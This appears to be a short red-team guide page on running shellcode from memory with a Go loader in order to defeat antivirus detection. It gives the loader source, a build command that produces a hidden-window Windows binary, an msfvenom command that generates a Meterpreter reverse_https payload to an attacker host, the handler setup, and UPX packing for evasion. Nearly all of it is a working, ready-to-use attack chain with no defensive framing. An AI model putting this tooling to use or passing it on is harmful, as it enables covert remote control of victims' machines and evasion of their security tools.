Load shellcode from memory using Golang
This is a program to run shellcode as its own process, all from memory written to defeat anti-virus detection.
Original code by brimstone mofified by JUMPSEC:
package main
import (
"encoding/hex"
"fmt"
"os"
shellcode "github.com/brimstone/go-shellcode"
)
func main() {
sc :="SHELLCODE-GOES-HERE"
sc_bin, err := hex.DecodeString(sc)
if err != nil {
fmt.Printf("Error decoding arg 1: %s\n", err)
os.Exit(1)
}
shellcode.Run(sc_bin)
}
The binary can be built using this command:
GOOS=windows \
GOARCH=amd64 \
go build -ldflags="-s -w -H=windowsgui" \
cmd/sc/main.go
To generate the shellcode you can use this command:
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=xxx \
LPORT=xxx \
-b \x00 \
-f hex
Starting the handler:
msfconsole -x "use exploit/multi/handler;\
set PAYLOAD windows/x64/meterpreter/reverse_https;\
set LHOST localhost;\
set LPORT 8443;\
run -j"
Packing the binary using UPX might help with Antivirus detection:
brew install upx
upx main.exe --brute
References
Last updated
Was this helpful?